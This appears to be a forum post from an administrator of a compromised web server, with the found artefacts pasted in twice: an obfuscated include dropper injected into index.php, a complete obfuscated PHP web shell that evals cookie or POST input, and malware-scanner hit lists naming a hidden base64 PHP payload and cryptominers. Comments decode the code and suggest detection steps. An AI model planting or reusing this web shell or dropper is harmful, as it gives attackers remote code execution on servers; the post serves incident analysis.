Server hacked: I found these, please advise how to deep scan and detect any vulnerabilities
Posted: Thu Apr 19, 2018 9:55 am
1. This was injected at the top of an index.php file:
<?php
/*3bd6f*/
// Dropper stub prepended to index.php. The hex escapes in the string decode to:
//   /home/kws/web/kazirangawildlifesociety.in/public_html/modules/blog/favicon_2d3934.ico
// i.e. a PHP payload stored under a ".ico" name so it is not noticed as code, and the
// leading "@" hides the warning if that file has already been removed. The path is an
// absolute path into the "kws" account's docroot, while the maldet hits elsewhere in this
// post are under /home/southasiavi/ — presumably the same payload is being reused across
// accounts on the host; confirm whether one site's user can read/write the other's docroot.
// The "3bd6f" comment markers bracket the injected lines and make a convenient grep key
// for finding every file that received the same injection.
@include "\x2fhom\x65/kw\x73/we\x62/ka\x7aira\x6egaw\x69ldl\x69fes\x6fcie\x74y.i\x6e/pu\x62lic\x5fhtm\x6c/mo\x64ule\x73/bl\x6fg/f\x61vic\x6fn_2\x64393\x34.ic\x6f";
/*3bd6f*/
================
2. another PHP file uploaded by the attacker (an obfuscated web shell):
<?php
// Obfuscated web shell (remote code execution backdoor). Indexing into the 35-character
// string $mslckg rebuilds every name the code needs so none appears literally in the file:
//   $zmkcjwn[0] = "2f6bcd32-c458-4cb6-a800-bd04c4d5d760"   (salt for the XOR keystream)
//   $zmkcjwn[1] = "H*"           $zmkcjwn[2] = "#"
//   $zmkcjwn[3] = "count"        $zmkcjwn[4] = "str_repeat"
//   $zmkcjwn[5] = "explode"      $zmkcjwn[6] = "substr"
//   $zmkcjwn[7] = "array_merge"  $zmkcjwn[8] = "strlen"
//   $zmkcjwn[9] = "pack"
// With the names substituted, the loop reads:
//   foreach (array_merge($_COOKIE, $_POST) as $name => $value) {
//       $value = @pack("H*", $value);                       // hex-decode the parameter value
//       $key   = substr(str_repeat($name . SALT, strlen($value) / strlen($name) + 1), 0, strlen($value));
//       $parts = explode("#", $value ^ $key);               // XOR with a keystream built from the NAME + salt
//       if (count($parts) % 3 == 0) { eval($parts[1]($parts[2])); exit(); }
//   }
// So any cookie or POST field whose hex value, once XORed with the keystream derived from
// its own field name and the salt above, splits on "#" into a multiple of three pieces has
// $parts[2] passed through the function named in $parts[1] (attacker-chosen, typically a
// decoder) and the result eval()ed as PHP. That is unauthenticated arbitrary code execution
// for anyone who knows the salt. Ordinary request parameters almost never produce a
// multiple of three pieces, so the file sits silently under normal traffic; the "@" on
// pack() hides the warnings non-hex input would otherwise raise.
// NOTE(review): the three helper functions are declared inside the loop body, so a second
// loop iteration would re-declare them (a PHP fatal) — presumably the operator sends a
// single parameter per request. Do not treat that as a mitigation.
// Detection: the assembled names never appear in the file, but "eval(", "exit()" and
// "$_COOKIE, $_POST" do — grep the docroot for single-line .php files containing eval(
// together with $_COOKIE/$_POST and character-index string assembly ($x[7].$x[17]...).
// Check access logs for POSTs (or unusual cookies) to this file's path, then rotate every
// credential the web user could reach (DB, FTP/SSH, CMS admin) after removal.
$mslckg = '*#_g6r\'2om8s5k7nlfud4H-3pxeiyctvab0';$zmkcjwn = Array();$zmkcjwn[] = $mslckg[7].$mslckg[17].$mslckg[4].$mslckg[33].$mslckg[29].$mslckg[19].$mslckg[23].$mslckg[7].$mslckg[22].$mslckg[29].$mslckg[20].$mslckg[12].$mslckg[10].$mslckg[22].$mslckg[20].$mslckg[29].$mslckg[33].$mslckg[4].$mslckg[22].$mslckg[32].$mslckg[10].$mslckg[34].$mslckg[34].$mslckg[22].$mslckg[33].$mslckg[19].$mslckg[34].$mslckg[20].$mslckg[29].$mslckg[20].$mslckg[19].$mslckg[12].$mslckg[19].$mslckg[14].$mslckg[4].$mslckg[34];$zmkcjwn[] = $mslckg[21].$mslckg[0];$zmkcjwn[] = $mslckg[1];$zmkcjwn[] = $mslckg[29].$mslckg[8].$mslckg[18].$mslckg[15].$mslckg[30];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[2].$mslckg[5].$mslckg[26].$mslckg[24].$mslckg[26].$mslckg[32].$mslckg[30];$zmkcjwn[] = $mslckg[26].$mslckg[25].$mslckg[24].$mslckg[16].$mslckg[8].$mslckg[19].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[18].$mslckg[33].$mslckg[11].$mslckg[30].$mslckg[5];$zmkcjwn[] = $mslckg[32].$mslckg[5].$mslckg[5].$mslckg[32].$mslckg[28].$mslckg[2].$mslckg[9].$mslckg[26].$mslckg[5].$mslckg[3].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[16].$mslckg[26].$mslckg[15];$zmkcjwn[] = $mslckg[24].$mslckg[32].$mslckg[29].$mslckg[13];foreach ($zmkcjwn[7]($_COOKIE, $_POST) as $cqkektp => $pkste){function qvfslq($zmkcjwn, $cqkektp, $rzuhf){return $zmkcjwn[6]($zmkcjwn[4]($cqkektp . $zmkcjwn[0], ($rzuhf / $zmkcjwn[8]($cqkektp)) + 1), 0, $rzuhf);}function vmgpz($zmkcjwn, $hzjjhan){return @$zmkcjwn[9]($zmkcjwn[1], $hzjjhan);}function kgusa($zmkcjwn, $hzjjhan){$ykasv = $zmkcjwn[3]($hzjjhan) % 3;if (!$ykasv) {eval($hzjjhan[1]($hzjjhan[2]));exit();}}$pkste = vmgpz($zmkcjwn, $pkste);kgusa($zmkcjwn, $zmkcjwn[5]($zmkcjwn[2], $pkste ^ qvfslq($zmkcjwn, $cqkektp, $zmkcjwn[8]($pkste))));}
===
3. this one looked like it tried to tamper with the /etc/passwd file — although note that the colon-separated line below is maldet's quarantine metadata record (owner:group:mode:size:md5:atime:mtime:ctime:path, as its own header says), not /etc/passwd content; the signature that fired, php.base64, indicates a base64-encoded PHP payload hidden in a favicon-named .ico file, the same pattern as the @include in item 1:
# owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
southasiavi:southasiavi:644:58506:0de8a2d08fc4d676878ab80bcf29efb4:1511262032:1524020672:1524020672:/home/**/web/***.com/public_html/modules/field/theme/favicon_90a817.ico
FILE HIT LIST:
{HEX}php.base64.v23au.186 : /home/southasiavi/web/southasiaviews.com/public_html/modules/field/theme/favicon_90a817.ico => /usr/local/maldetect/quarantine/favicon_90a817.ico.273699283
===
4. FILE HIT LIST:
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/php5 => /usr/local/maldetect/quarantine/php5.11317678
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/systemd => /usr/local/maldetect/quarantine/systemd.1709516610
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /dev/shm/x => /usr/local/maldetect/quarantine/x.2515229452
===
<?php
/*3bd6f*/
// Dropper stub prepended to index.php. The hex escapes in the string decode to:
//   /home/kws/web/kazirangawildlifesociety.in/public_html/modules/blog/favicon_2d3934.ico
// i.e. a PHP payload stored under a ".ico" name so it is not noticed as code, and the
// leading "@" hides the warning if that file has already been removed. The path is an
// absolute path into the "kws" account's docroot, while the maldet hits elsewhere in this
// post are under /home/southasiavi/ — presumably the same payload is being reused across
// accounts on the host; confirm whether one site's user can read/write the other's docroot.
// The "3bd6f" comment markers bracket the injected lines and make a convenient grep key
// for finding every file that received the same injection.
@include "\x2fhom\x65/kw\x73/we\x62/ka\x7aira\x6egaw\x69ldl\x69fes\x6fcie\x74y.i\x6e/pu\x62lic\x5fhtm\x6c/mo\x64ule\x73/bl\x6fg/f\x61vic\x6fn_2\x64393\x34.ic\x6f";
/*3bd6f*/
================
2. another PHP file uploaded by the attacker (an obfuscated web shell):
<?php
// Obfuscated web shell (remote code execution backdoor). Indexing into the 35-character
// string $mslckg rebuilds every name the code needs so none appears literally in the file:
//   $zmkcjwn[0] = "2f6bcd32-c458-4cb6-a800-bd04c4d5d760"   (salt for the XOR keystream)
//   $zmkcjwn[1] = "H*"           $zmkcjwn[2] = "#"
//   $zmkcjwn[3] = "count"        $zmkcjwn[4] = "str_repeat"
//   $zmkcjwn[5] = "explode"      $zmkcjwn[6] = "substr"
//   $zmkcjwn[7] = "array_merge"  $zmkcjwn[8] = "strlen"
//   $zmkcjwn[9] = "pack"
// With the names substituted, the loop reads:
//   foreach (array_merge($_COOKIE, $_POST) as $name => $value) {
//       $value = @pack("H*", $value);                       // hex-decode the parameter value
//       $key   = substr(str_repeat($name . SALT, strlen($value) / strlen($name) + 1), 0, strlen($value));
//       $parts = explode("#", $value ^ $key);               // XOR with a keystream built from the NAME + salt
//       if (count($parts) % 3 == 0) { eval($parts[1]($parts[2])); exit(); }
//   }
// So any cookie or POST field whose hex value, once XORed with the keystream derived from
// its own field name and the salt above, splits on "#" into a multiple of three pieces has
// $parts[2] passed through the function named in $parts[1] (attacker-chosen, typically a
// decoder) and the result eval()ed as PHP. That is unauthenticated arbitrary code execution
// for anyone who knows the salt. Ordinary request parameters almost never produce a
// multiple of three pieces, so the file sits silently under normal traffic; the "@" on
// pack() hides the warnings non-hex input would otherwise raise.
// NOTE(review): the three helper functions are declared inside the loop body, so a second
// loop iteration would re-declare them (a PHP fatal) — presumably the operator sends a
// single parameter per request. Do not treat that as a mitigation.
// Detection: the assembled names never appear in the file, but "eval(", "exit()" and
// "$_COOKIE, $_POST" do — grep the docroot for single-line .php files containing eval(
// together with $_COOKIE/$_POST and character-index string assembly ($x[7].$x[17]...).
// Check access logs for POSTs (or unusual cookies) to this file's path, then rotate every
// credential the web user could reach (DB, FTP/SSH, CMS admin) after removal.
$mslckg = '*#_g6r\'2om8s5k7nlfud4H-3pxeiyctvab0';$zmkcjwn = Array();$zmkcjwn[] = $mslckg[7].$mslckg[17].$mslckg[4].$mslckg[33].$mslckg[29].$mslckg[19].$mslckg[23].$mslckg[7].$mslckg[22].$mslckg[29].$mslckg[20].$mslckg[12].$mslckg[10].$mslckg[22].$mslckg[20].$mslckg[29].$mslckg[33].$mslckg[4].$mslckg[22].$mslckg[32].$mslckg[10].$mslckg[34].$mslckg[34].$mslckg[22].$mslckg[33].$mslckg[19].$mslckg[34].$mslckg[20].$mslckg[29].$mslckg[20].$mslckg[19].$mslckg[12].$mslckg[19].$mslckg[14].$mslckg[4].$mslckg[34];$zmkcjwn[] = $mslckg[21].$mslckg[0];$zmkcjwn[] = $mslckg[1];$zmkcjwn[] = $mslckg[29].$mslckg[8].$mslckg[18].$mslckg[15].$mslckg[30];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[2].$mslckg[5].$mslckg[26].$mslckg[24].$mslckg[26].$mslckg[32].$mslckg[30];$zmkcjwn[] = $mslckg[26].$mslckg[25].$mslckg[24].$mslckg[16].$mslckg[8].$mslckg[19].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[18].$mslckg[33].$mslckg[11].$mslckg[30].$mslckg[5];$zmkcjwn[] = $mslckg[32].$mslckg[5].$mslckg[5].$mslckg[32].$mslckg[28].$mslckg[2].$mslckg[9].$mslckg[26].$mslckg[5].$mslckg[3].$mslckg[26];$zmkcjwn[] = $mslckg[11].$mslckg[30].$mslckg[5].$mslckg[16].$mslckg[26].$mslckg[15];$zmkcjwn[] = $mslckg[24].$mslckg[32].$mslckg[29].$mslckg[13];foreach ($zmkcjwn[7]($_COOKIE, $_POST) as $cqkektp => $pkste){function qvfslq($zmkcjwn, $cqkektp, $rzuhf){return $zmkcjwn[6]($zmkcjwn[4]($cqkektp . $zmkcjwn[0], ($rzuhf / $zmkcjwn[8]($cqkektp)) + 1), 0, $rzuhf);}function vmgpz($zmkcjwn, $hzjjhan){return @$zmkcjwn[9]($zmkcjwn[1], $hzjjhan);}function kgusa($zmkcjwn, $hzjjhan){$ykasv = $zmkcjwn[3]($hzjjhan) % 3;if (!$ykasv) {eval($hzjjhan[1]($hzjjhan[2]));exit();}}$pkste = vmgpz($zmkcjwn, $pkste);kgusa($zmkcjwn, $zmkcjwn[5]($zmkcjwn[2], $pkste ^ qvfslq($zmkcjwn, $cqkektp, $zmkcjwn[8]($pkste))));}
===
3. this one looked like it tried to tamper with the /etc/passwd file — although note that the colon-separated line below is maldet's quarantine metadata record (owner:group:mode:size:md5:atime:mtime:ctime:path, as its own header says), not /etc/passwd content; the signature that fired, php.base64, indicates a base64-encoded PHP payload hidden in a favicon-named .ico file, the same pattern as the @include in item 1:
# owner:group:mode:size(b):md5:atime(epoch):mtime(epoch):ctime(epoch):file(path)
southasiavi:southasiavi:644:58506:0de8a2d08fc4d676878ab80bcf29efb4:1511262032:1524020672:1524020672:/home/**/web/***.com/public_html/modules/field/theme/favicon_90a817.ico
FILE HIT LIST:
{HEX}php.base64.v23au.186 : /home/southasiavi/web/southasiaviews.com/public_html/modules/field/theme/favicon_90a817.ico => /usr/local/maldetect/quarantine/favicon_90a817.ico.273699283
===
4. FILE HIT LIST:
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/php5 => /usr/local/maldetect/quarantine/php5.11317678
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /tmp/systemd => /usr/local/maldetect/quarantine/systemd.1709516610
{CAV}Multios.Trojan.CryptocoinMiner-6448864-1 : /dev/shm/x => /usr/local/maldetect/quarantine/x.2515229452
===